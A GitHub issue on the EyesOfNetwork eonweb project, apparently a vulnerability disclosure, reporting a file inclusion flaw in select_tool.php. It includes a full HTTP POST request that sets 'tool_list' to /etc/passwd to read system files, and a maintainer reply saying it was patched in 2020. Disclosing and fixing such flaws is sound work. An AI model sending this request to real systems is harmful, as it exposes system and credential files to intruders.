EyesOfNetworkCommunity / eonweb

EyesOfNetwork web interface
8 stars 12 forks source link

Remote File Inclusion (authentified) #83

Closed ArianeBlow closed 3 years ago

ArianeBlow commented 3 years ago

Hello,

J'ai trouvé une faille RFI dans le module des tools (/module/tool_all/select_tool.php). Le problème est situé au niveau du paramettre "tool_list=", il est possible d'inclure des documents et fichiers de la machine distante en y renseignant son emplacement (j'ai pris /etc/passwd pour l'exemple) :

=======================================================================

POST /module/tool_all/select_tool.php HTTP/1.1
Host: 192.168.0.26
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 209
Origin: https://192.168.0.26
Connection: close
Referer: https://192.168.0.26/module/tool_all/
Cookie: session_id=746751013; user_name=admin; user_id=1; user_limitation=0; group_id=1

(tool_list=FILE TO READ)
page=bylistbox&host_list=127.0.0.1&tool_list=/etc/passwd&snmp_com=aze&snmp_version=2c&min_port=1&max_port=1024&username=&password=&snmp_auth_protocol=MD5&snmp_priv_passphrase=&snmp_priv_protocol=&snmp_context=

=======================================================================

Cette requête retourne le contenu de /etc/passwd : https://ibb.co/cF8SStR

Strange Think !

OscarPoels commented 3 years ago

Bonjour, cette faille a déjà été corrigée depuis le 16 Juin 2020, dans le commit dddab9fecea42f373907c093b87218fa0f2d4c42 et n'est donc par conséquent plus exploitable dans la dernière version d'eonweb. Je pense que vous disposez bien de la version 5.3-10 mais que votre configuration n'est pas à jour. Je vous invite à effectuer un yum update sur votre machine pour ne plus être vulnérable à cette faille. Merci